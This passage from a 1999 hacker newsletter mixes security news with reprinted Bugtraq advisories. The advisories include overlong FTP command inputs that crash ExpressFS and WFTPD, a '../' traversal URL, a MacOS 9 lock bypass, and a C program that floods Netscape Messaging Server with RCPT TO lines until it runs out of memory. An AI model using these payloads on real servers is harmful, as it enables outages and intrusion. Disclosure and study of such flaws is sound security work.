shipping for less than one week and is the first version
of MacOS to support multiple users. The vulnerability
allows one user to bypass the Console Lock feature and
gain access to another users files. (This is a wicked
simple hole, it is very surpriseing that this problem was
not discovered during testing.)

Security Focus
http://www.securityfocus.com/bid/745"

bugtraq id 745
class Design Error
cve GENERIC-MAP-NOMATCH
remote No
local Yes
published October 26, 1999
updated October 26, 1999
vulnerable Apple MacOS 9.0

MacOS 9 includes an idle-activated console lock feature, similar to a
screensaver password in other operating systems. After a certain length
of user inactivity, a dialog box appears stating that a password must be
entered. After the user clicks 'OK' another dialog box appears offering
the option to either supply a password or to log out the current user. If
the 'log out' option is chosen, any programs running will start to shut
down. In certain programs, dialog boxes are created in the shutdown
process (for example, "
Exit without saving? OK/Cancel"). If the user
selects 'Cancel', the shutdown process is aborted and the user is
returned to the current session without ever having to enter a password

Apple has been notified, and It has been filed into their bug database as
ID #2404562.


credit
Posted to Bugtraq by Sean Sosik-Hamor <ssh@shn.nu> on
October 26, 1999.

reference
message:
Mac OS 9 Idle Lock Bug
(Sean Sosik-Hamor <ssh@shn.nu>)

@HWA

48.0 Time Spreads Cable Modem FUD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by InfinityMatrix
In the November 1st Issue of Time Magazine, the
Technology section highlighted the Cable modem issue.
The author, Chris Taylor, states that "
most common
attack reported by hacker watchers makes use of a
Trojan Horse." It goes on further spreading FUD, "If
you've hooked up a microphone, the remote-access
hacker can listen to your conversations in real-time. If
you own one of those little monitor-top video cameras,
he can watch you like Big Brother." (A cable modem is
no more dangerous than a regular modem. The fact
that you have an insecure machine connected directly
to the internet is the problem. Not the cable modem.
Stop blaming the technology for a personal problem.)

Time.com
http://www.pathfinder.com/time/magazine/articles/0,3266,33139,00.html

PERSONAL TIME/YOUR TECHNOLOGY
NOVEMBER 1, 1999 VOL. 154 NO. 18

Hacker's Delight Cable modems are a speedy way to surf, but they're
vulnerable--unless you protect youself BY CHRIS TAYLOR

I know what gadget I want for my birthday this year. It's the same thing
I've lusted after for a couple of birthdays now, and I'd trade in all the
socks, ties and humorous cards about aging if only I could have it.
Unfortunately, I can't, because it's a cable modem--which lets you
traverse the Net at about 20 times the speed of a 56K modem--and
cable-modem service is very spotty right now. In Manhattan, for example,
I'd have to live between 59th and 67th Street, or in the ultra-hip East
Village. Service will arrive in my slightly less hip corner of the West
Village in fall 2000, which is way too late to help with my dream of
downloading every last music track on http://MP3.com.

The other bad news on cable modems--and this is why I'm a little mollified
that I can't have one yet--is that they're more vulnerable to hacker
attacks than regular set-ups. You see, one of the strengths of surfing via
cable is that you're online 24 hours a day and don't have to disconnect
every time you want to order Chinese food. But that can also be a
weakness, because your IP address (the ZIP code of the Internet) doesn't
change. Dial-up users like me who are still crawling along at 56K get
moved to a different IP address every time we log on. We may be slower,
but we're harder to find.

Hackers like an easy target, and computers hooked up to cable modems are
potentially the lowest-hanging fruit of all. Especially if they're running
Windows. For reasons known only to itself, Microsoft makes its operating
system default to friendly mode, entirely open to network sharing. This
means when you hook your brand-new PC up to your brand-new cable modem,
you unwittingly become a node on a massive network whose members can come
and look around your hard drive, perhaps download your financial records.

But the most common attack reported by hacker watchers makes use of a
Trojan horse. These are programs with bizarre names like Back Orifice or
Net Bus that can be hidden in an e-mail attachment--say, one of those
animated birthday cards people seem to like e-mailing. Once you open it,
you've installed the software--and the wily hacker has remote control of
your PC.

To be sure, dial-up users get hit by Trojans too. But all the extra
bandwidth provided by cable modems makes hackers salivate. If you've
hooked up a microphone, the remote-access hacker can listen to your
conversations in real-time. If you own one of those little monitor-top
video cameras, he can watch you like Big Brother.

Now here's the good news. Such attacks are still rare; they can easily be
detected; and all it takes to prevent them is common sense. Turn off file
sharing in your network control panel. Add password protection to your
most precious files. And for goodness' sake, don't ever, ever open an
e-mail attachment from someone you don't know and trust like family.

The even better news is that cable-modem providers like Road Runner
(partly owned by Time Warner, parent company of this magazine) and
Excite@Home are working on bigger and better firewalls to help stop
snooping. Since they're twice as fast as DSL phone lines, cable modems are
worth the risk. They will never be hackproof, but they should be a lot
safer by the time my next birthday rolls around. This year, I'll have to
settle for socks again.

For more on cable modems and how to protect
them, see http://timedigital.com. Questions for
Chris? E-mail him at cdt@well.com END

@HWA

49.0 DutchThreat Quit?
~~~~~~~~~~~~~~~~

From http://www.403-security.org/

http://www.dutchthreat.org/

Dutchthreat an underground group is showing its' dismay with the current
state of affairs in the underground, originally the group announced via
its web page that it had quit the scene outright but later said that they
'would be back' more on this as it progresses...

Original 'quit' message;




"
The hackers-scene died and we are not living it anymore.. "

The current defacements by #phreak.nl with their 'RedAttack the Rat"
actions
pushed us over the edge.
It's not just their ignorance, it's the ignorance of so many lately.
We are not supporting acts of childish people anymore.
With this page we apologize for the behavior of so many.

The Dutch Threat Crew.

info@dutchthreat.org



Current message;

29-10-99 We will be back..
Ok.. you win..
We received loads of mail of people telling us
we over-reacted by 'quitting' Dutch Threat.
Although it was never the intention to
quit Dutch Threat for real the previous page
was more of a temporary protest against script-kiddie
behavior that, to our opinion, reached it limits by
a #phreak.nl defacement.
Since lack of privacy is the issue here we shouldn't run away from
it but instead use the medium we have to defend ourselves
and give our opinion.
That's what Dutch Threat was all about in the beginning..
I'll set up a credit list with all the people that told us so ;)
Tonight, After a long and boring talk with Gerrie (www.hit2000.org)
he convinced me (Acos) that publishing private data from individuals in public
is the only way to make people privacy-aware.
Although i agree with that i'm still sure you should never use
that information to start a warfare because of a personal disagreement.
The RedAttack stuff isn't the only reason for the temporary shutdown of
DT, I will explain this later.
I still condemn the RedAttack-defacements by phreak.nl because of their
childish content.. but i realized they made a point in general.
So i will do the same using the motto 'there is no privacy and why should
we care?'... ;)


@HWA

50.0 Can you protect your image on the net?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org


Can You Protect Your
Image on the Net?

http://www.pcworld.com/pcwtoday/article/0,1510,13494,00.html

Rival developer says Clever Content Server's
security is easily cracked.

by David Essex, special to PC World
October 27, 1999, 9:07 a.m. PT

Alchemedia claims that its Clever Content Server
encryption software, which started shipping this month,
is just what Webmasters and visual artists need to
prevent their valuable images from being copied and
distributed. But a competing software maker says it
easily cracked Alchemedia's program, so hackers
could easily do so, too.

Clever Content Server encrypts images stored on a
Web site's servers, at a cost of $10,000-plus per server
per year. When someone clicks on an image, the
program sends a free browser plug-in called Clever
Content Viewer, followed by the image. The viewer
decrypts and displays the image, but the user can't
copy, save, print, or capture it.

"The Internet is a big copying machine," says
Alchemedia Chief Executive Officer Daniel Schreiber.
Content providers typically put up grainy thumbnail
images or none at all. "It's keeping good content off the
Web,"
Schreiber says. "The whole $13-billion digital
content industry is unable to take advantage of the
e-commerce opportunity."


Get Cracking on This

But Greg Heileman, president of competitor Elisar
Systems, says his company broke through the beta
version in a day and the shipping version in a hour. He
says Clever Content Server attempts to catch improper
access of video memory by using three Windows
dynamic link libraries, a process that is easy for
experienced hackers to crack.

Heileman says his own product, SecureViewer
(expected to ship by the end of October), is more
secure because it directly controls the video hardware.
But he acknowledges that SecureViewer isn't totally
hacker-proof, since someone could use a hardware
device to grab the video signal on its way to the PC
monitor.

SecureViewer, priced at around $6 to $10 for each
image encrypted, requires users to download a larger
viewer program than Alchemedia's, but does not require
server software. To display an image, SecureViewer
takes over the entire screen, leaving the browser
running in the background.

Schreiber responds that SecureViewer doesn't work in
the Web-friendly way that content providers want. He
says Clever Content Viewer provides an adequate
deterrent to image theft without compromising usability.
"We're not really interested in hackers and hacker-proof
technology for the simple reason that our customers
aren't, either,"
Schreiber says.

Customer Concerns

Alchemedia (formerly Csafe) first released a beta
version of the software early this year under the name
PixSafe. One potential customer, Photos to Go, an
online vendor of stock photography that has used the
beta version in an online demo since February,
acknowledged last month that there were security
issues surrounding the software.

"There have been things which have been brought to
our attention, which have been fixed,"
says Kathy
Mullins, vice president of electronic services at Photos
to Go. "We've looked at a lot of security products, and
no one has told us they're airtight. Hackers will always
find a way."


@HWA

51.0 Do secure email sites offer foolproof safety?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org/

http://www.seattletimes.com/news/technology/html98/inbo_19991024.html



Do secure e-mail sites offer foolproof
safety?

by Charles Bermant
Special to the Seattle Times

The notion that free Web-based e-mail may not be secure is a
scary thought for users of these services, as they have come to
rely on the convenience of logging on anywhere and exchanging
up-to-the-minute information.

These people don't want to have to lug a laptop around, or worse:
wait until they get home until checking their messages.

There is now an alternative - sort of. Free e-mail services that
promise an increased level of security are emerging, promising that
what you put on their servers is doubly protected from prying
eyes.

Both HushMail http://www.hushmail.com and SAFe-mail.net
http://www.safe-mail.net sell (actually, give away) peace of mind.

Both have simple, Web-based interfaces, not quite as robust as
Outlook or Eudora but usable nonetheless.

Hush Mail resembles HotMail, with its display ads and
membership solicitation attached to each message.

SAFe-mail.net has no such decoration.

HushMail has no frills, while SAFe-mail attempts to build a
community, offering a chat room and bulletin boards.

SAFe-mail follows the now time-honored Internet tradition of
providing free goods as a teaser for its paid service.

Explains company representative Ian Buller, "We will offer a
chargeable service to organizations who want to outsource their
secure communications or as a delivered system to organizations
who want to host the server at their own location."


According to my unscientific test, the two services also differ in
other ways: HushMail has a faster mail client interface, while
SAFe-mail has a slightly faster delivery.

In fact, their usefulness is necessarily limited. The encryption
works only on mail sent and received on their server. Cross their
firewall, and it's just as open as any other system.

So in order for it to make a difference, all correspondence must
take place on their server. Anywhere else, a HushMail or
SAFe-net address is just an advertisement for security, the
equivalent of a Brinks sign on the lawn of a house that doesn't
have an alarm system.

Still, it's a little strange to see people get all worked up about
e-mail security.

Protection of messages is equivalent to talking on the phone or
having a "private" conversation in a restaurant.

Technology exists to eavesdrop, and anything you say on the
phone could be coming out of a speaker somewhere.

But so what? The average conversations concern only the
participants and their circle of associates. Who else really cares
about what you are saying?

Bill Gates and Bill Clinton need to take appropriate measures, but
the rest of us just need to be reasonably tactful and discreet.

Reader response: Mauri Pelto agreed with my
emoticon-phobia, saying "the use of cutesy smiley faces and
jargon only says to me the writer thinks of himself as pretty cool
just because he has learned to use e-mail and needs to use the
`in-language' of his new peer group to remind himself he's pretty
cool. Content has become secondary to cutesiness."


But David P. Anderson disagreed - violently. After calling this
column "a waste of newspaper space better spent on advertising"
(ouch), he points out "these symbols have been in use for long
enough to have their own name. In fact, they've been around
longer than computers, how do you think disparate cultures learn
to communicate? Or perhaps, you just figure they should learn
English?"


Dave counsels me to "do a little research, find out why these
things are done, before you decide that it's your job to tell us we
shouldn't do them."


I think he is confused. It is not my "job" to tell anyone how to act.
I only suggest that some aspects of e-mail behavior may be
offensive or annoying. An extremist position - "emoticons are bad"
- is only meant to push people toward more moderate behavior:
"If I can prevent just one person from sending just one smiley
face. ..."


And at the end of an amusing letter where each potential emoticon
was explained in parentheses, Michael Cameron got to his point:
"As a literary tool to avoid confusion, instill a bit of `humanity'
back into your communications in this totally `cold and impersonal
realm,' (emoticons) are priceless."


Charles Bermant's advice on e-mail appears weekly in the
Personal Technology section of The Seattle Times. If you
have questions or suggestions, you can contact him, by
e-mail, at ptech@seatimes.com Type "Inbox" in the subject
field.

@HWA

52.0 Celtech ExpressFS USER Buffer Overflow Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id 749
class Boundary Condition Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published October 29, 1999
updated October 29, 1999

vulnerable

Celtech Software ExpressFS 2.6
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0

Celtech's ExpressFS FTP server has been found to be vulnerable by
means of a buffer overflow. If an argument of sufficient length is passed
after the USER command, the next command sent will cause it to crash

Credit
Posted to bugtraq by Luciano Martins
<luck@ussrback.com> On October 29, 1999.

reference

message:
ExpressFS 2.x FTPServer remotely exploitable
buffer overflow vulnerability
(Luciano Martins <luck@ussrback.com>)

To: BugTraq
Subject: ExpressFS 2.x FTPServer remotely exploitable buffer overflow vulnerability
Date: Thu Oct 28 1999 19:04:40
Author: Luciano Martins
Message-ID: <NCBBKFKDOLAGKIAPMILPCEFNCAAA.luck@ussrback.com>


ExpressFS 2.x FTPServer remotely exploitable buffer overflow vulnerability

Problem:

We found in the ExpressFS 2.x FTP Server and earlier a vulnerable to
remotely exploitable buffer overflow. This can result in a denial of service
and at worst in arbitrary code being executed on the system.

The vulnerabilities are the conjunction of one long user name ,and another
command in this case PASS, If this long command are passed in order program
crash.

Tested in: Windows 98 / Windows NT

Example:

First command

USER
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
Second command

PASS i want you crash :)


Crash.....Overflow.

Published by: USSRBACK

Luck Martins

u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
www.USSRBACK.COM


@HWA

53.0 Netscape Messaging Server RCPT TO DoS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id 748
class Input Validation Error
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published October 29, 1999
updated October 29, 1999

vulnerable

Netscape Messaging Server 3.6
Netscape Messaging Server 3.55
Netscape Messaging Server 3.54

Netscape Messaging server will not de-allocate memory that is used to
store the RCPT TO information for an incoming email. By sending
enough long RCPT TO addresses, the system can be forced to
consume all available memory, leading to a denial of service.

Example and exploit by Nobuo Miwa <n-miwa@lac.co.jp>

220 victim.workgroup ESMTP server (Netscape Messaging Server -
Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900
helo rcpt2
250 victim.workgroup
mail from : rcpt2
250 Sender <rcpt2> Ok
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....

Repeat until DoS


/***************************************************************
You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
whether vulnerable for too much RCPT TO or not.
by Nobuo Miwa, LAC Japan 28th Oct. 1999
http://www.lac.co.jp/security/
****************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define STR_HELO "HELO rcpt2\n"
#define STR_MAILFROM "MAIL FROM:rcpt2\n"
#define RCPT2_LENGTH 8000
#define RCPT2_NUMBER 10000

int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
int port=25, sd, rt ;
long li ;
struct hostent *he;

si->sin_addr.s_addr = inet_addr(hostIPaddr);
si->sin_family = AF_INET;
si->sin_port = htons (port);
sd = socket (si->sin_family, SOCK_STREAM, 0);
if (sd == -1) return (-1);

rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
if ( rt < 0 ) {
close(sd);
return(-1);
}

return(sd) ;
}

void sendRCPT2(int sd)
{
char rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
int rt, i;

memset( tmpStr, 0, sizeof(tmpStr) ) ;
recv( sd, tmpStr, sizeof(tmpStr), 0 );
printf("%s",tmpStr);

printf("%s",STR_HELO);
send( sd, STR_HELO, strlen(STR_HELO), 0 );
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
if ( rt>0 ) printf("%s",tmpStr);

printf("%s",STR_MAILFROM);
send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
memset( tmpStr, 0, sizeof(tmpStr) ) ;
rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
if ( rt>0 ) printf("%s",tmpStr);

strcpy( rcptStr, "RCPT TO: rcpt2@" ) ;
while ( RCPT2_LENGTH-strlen(rcptStr)>10 )
strcat( rcptStr, "aaaaaaaaaa") ;
strcat( rcptStr, "\n" );
for ( i=0 ; i<RCPT2_NUMBER ; i++ ) {
printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr));
send( sd, rcptStr, strlen(rcptStr), 0 );
rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 );
strncpy( strn, tmpStr, 60 ) ;
if ( rt>0 ) printf("%s \n",strn);
}

return;
}

int main (int argc, char *argv[])
{
char hostIPaddr[80], *cc, *pfft;
int sd = 0;
struct sockaddr_in si;

printf("You can use ONLY for YOUR Messaging Server 3.6\n");
if (argc != 2) {
printf("Usage: %s IPaddress \n",argv[0]);
exit(1);
} else
strcpy (hostIPaddr, argv[1]);

sd = openSocket(&si,hostIPaddr);

if (sd < 1) {
printf("failed!\n");
exit(-1);
}

sendRCPT2( sd );
close (sd);

exit(0);
}


Netscape has stated a release date of December 1999 for Messaging
Server 4.15, which will not include this vulnerability.

Credit
Posted to Bugtraq October 29 by Nobuo Miwa
<n-miwa@lac.co.jp>.

reference

message:
Netscape Messaging Server RCPT TO vul.
(Nobuo Miwa <n-miwa@lac.co.jp>)

@HWA

54.0 WFTPD Remote Buffer Overflow Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id 747
class Boundary Condition Error
cve GENERIC-MAP-NOMATCH
remote Yes
local No
published October 28, 1999
updated October 28, 1999


vulnerable

Texas Imperial Software WFTPD 2.40
- Microsoft Windows 3.11WfW
- Microsoft Windows 3.11
- Microsoft Windows 3.1
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 3.5
Texas Imperial Software WFTPD 2.34
- Microsoft Windows 3.11WfW
- Microsoft Windows 3.11
- Microsoft Windows 3.1
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 3.5

There is a remotely exploitable buffer overflow vulnerability in WFTPD that is known to affect
versions 2.34 and 2.40. The overflow exists in the MKD and CWD commands, which if
argumented with long strings in the right order, can overrun the buffer and allow for aribtrary
code execution on the target host.

This is from the BugTraq posting:

First command

MKD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Second command

CWD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Crash.....Overflow.

credit
First posted to BugTraq by Luciano Martins
<luck@ussrback.com> on Oct 28, 1999.

reference

web page:
WTFPD Homepage
(Texas Imperial Software)
message:
WFTPD v2.40 FTPServer remotely exploitable
buffer overflow vulnerability
(Luciano Martins <luck@ussrback.com>)




To: BugTraq
Subject: WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability
Date: Wed Oct 27 1999 19:07:55
Author: Luciano Martins
Message-ID: <NCBBKFKDOLAGKIAPMILPOEFBCAAA.luck@ussrback.com>


We found in the WFTPD v2.34,v2.40 Server and earlier a vulnerable to
remotely exploitable buffer overflow. This can result in a denial of service
and at worst in arbitrary code being executed on the system.

The vulnerabilities are the conjunction of two large commands the MKD and
CWD if they are passed an argument a string exact of 255 characters, If
this 2 large commands are passed in order program crash.
Tested in: Windows 98 / Windows Nt

Example:

First command

MKD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Second command

CWD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Crash.....Overflow.


Luck Martins

u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
WWW.USSRBACK.COM



55.0 Pacific Software URL Live! Directory Traversal vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id 746
class Unknown
cve GENERIC-MAP-NOMATCH
remote Yes
local Yes
published October 28, 1999
updated October 28, 1999


vulnerable Pacific Software URL Live! 1.0

- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0

The URL Live! free webserver from Pacific software is susceptible to the
"../" directosy traversal vulnerability. By using the '../' string in a URL, an
attacker can gain read access to files outside the intended web file
structure.

Example:
http ://xyz.com/../../../config.sys

credit
Posted to Bugtraq by UNYUN
<shadowpenguin@backsection.net> on October 28, 1999.

reference
web page:

URL Live! - A Free HTTP Server by PSPINC
(Pacific Software)
http://www.urllive.com/

message:
URL Live! 1.0 WebServer
(UNYUN <shadowpenguin@backsection.net>)


@HWA


56.0 InfoSec for Dummies Parts I and II
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


INFOSEC by Dummies - Part I



Part one of a four part series by John Johnson

October 28, 1999 - Mix some programming code, state-of-the-art hardware,
network connections, nerds of all shapes and sizes, hackers, viruses,
firewalls, application software, Internet access, World Wide Web sites,
and a little oregano, and you will find yourself either at a Microsoft
TechNet conference or the front-line of the information security (INFOSEC)
battlefield. I want to go on record that I admire, respect, and will
always seek guidance from the many men and women that devote their careers
to the information technology profession. I do not blame them in their
approach to security professionals as "the bad guys trying to shut down
their networks or implement so many security features that the network
slows down to a crawl at 10,000 micro bits per second speed."
There are
many security professionals that are trying to educate information
technology people about the threats and vulnerabilities of networks that
the real bad guys take advantage of to interfere with the proper function
of the network and the information systems connected to it. However, I
want to emphasize that security professionals working in the information
security field are providing support services to information technology,
not vice versa. The bottom-line mission is that information networks and
systems function properly without any loss to confidentiality, integrity,
or availability. Most information management personnel are busy
maintaining networks and system access, with little time left to audit
access control logs and ensure security features enabled function
properly. Security patches are implemented when personnel are notified,
but security is given the last consideration. The one positive area that
both information technology and security professionals are able to work
closely and effectively is increasing user awareness of computer security
issues. That partnership and coordination helps to develop a stronger
working relationship for security support to information technology
personnel. As compliance with the Y2K millennium bug problem is resolved,
the next priority focus will be computer security. Some approaches to
security problems will be technology-based, but there will remain both
non-technical problems and security issues that technology cannot address
alone. Personnel security, social engineering, application of law and
ethics in conducting investigations, the principles of physical security,
and contingency planning are examples of such non-technical issues and
problems facing information management. Social engineering is one such
non-technical problem that existed long before computers. Many of us with
an intelligence background were aware of social engineering techniques for
many years. Helping raise user awareness of these techniques and
countermeasures to employ is one of the many ways security professionals
assist information technology personnel. Security professionals with
technical understanding of networks and various protocols that computers
use to communicate with each other, is the growing area of support that
information security, as part of information assurance, is evolving. But
more work is needed and the information assurance field is addressing
those issues, both in developing countermeasures to threats and
vulnerabilities and by proactively planning protective measures for the
networks of tomorrow. Security safeguards are intended as procedures and
systems designed to protect an organization's ability to perform its basic
business function, not be an obstacle to prevent it. I know many people
perceive "security" as problem to overcome or ignore. However, from an
operational standpoint, the purpose of security measures is to ensure
business success. Stay tuned for the rest of the series: Part Two: Who is
in charge? What needs to be protected? Part Three: Detailed laundry list
of your vulnerabilities Part Four: What is your INFOSEC disaster recovery
plan?
John D. Johnson is a security consultant based in California and a former
Special Security Officer with the U.S. Government.











INFOSEC by Dummies - Part II



October 29, 999 -

Security is a managerial responsibility; in other words, both
senior managers and supervisors are responsible for exercising security in
their overall and day-to-day operations. For example, is it the shop
supervisor's responsibility or the safety officer's at the corporate level
if an employee removes safety features off their equipment and then
subsequently gets injured? Who is in charge of the employee? The same
concept applies to security. Maintaining the security of an organization's
computers required for business is part of business management. Who is
responsible for the business management of their personnel? The supervisor
and senior manager of the individual or the company security manager?
Company security managers are responsible for overseeing the security
process and coordinate requirements to accomplish it, they are not
responsible for the business functions of company personnel. Rather they
are there to assist the supervisor and senior manager in accomplishing the
security portion of computer operations. While a senior manager has an
overall responsibility for security (like they have for everything else),
they obviously cannot perform all the tasks required. Key personnel
(including supervisors at all levels) and employees must implement
security procedures to ensure protective measures actually work. What
needs to be protected? We are increasingly becoming dependent on modern
technology that makes us all more productive.

  
Any disruption to that
production limits our ability to get the job done. As I mentioned earlier,
information systems and networks operate properly when effective security
measures (both technical and procedural) are implemented that protect the
confidentiality, integrity, and availability of our information and
equipment. Confidentiality is protection from unauthorized disclosure;
integrity is protection from unauthorized change or destruction; and,
availability is protection that ensures that information and equipment are
accessible to authorized users when they need it. Easier said than done,
but we must try or else suffer the consequences of losing our information
or systems that we need to accomplish our work. Why security? The most
obvious answer is to comply with laws and company policies that require we
take protective measures to safeguard company data and equipment as well
as our personnel. But there is more. We need to provide protection of our
information and operations to get our work done. We need to protect the
privacy of individuals. Protection of information systems permit
management at all levels to make sound business decisions on accurate and
timely information. We protect our jobs when we keep pace with technology
to implement countermeasures that address new vulnerabilities and threats.
We also maintain and improve the integrity and reputation of our
organization. Facts Let review some facts. Fact: computers are critical to
fulfilling your job or supporting your job. Fact: computers are
vulnerable. Weaknesses in an information system or components (procedures;
hardware designs; internal controls, software bugs; etc.) could be
exploited. Fact: there are defined threats to your computer system. While
the media highlights stories about hackers, Chinese spies, and
intelligence agency Big Brother tactics, the reality is that the insider
threat, including accidents and mistakes, is the growing threat and that
people place convenience over security in their day-to-day lives. What is
information security? The protection of information in all formats,
including electronic, hardcopy, magnetic media, etc., against unauthorized
access to or modification or destruction of information, whether in
storage, processing or transit (across a network), and against the denial
of service to authorized users or providing service to unauthorized users,
including those measures necessary to detect, document and counter such
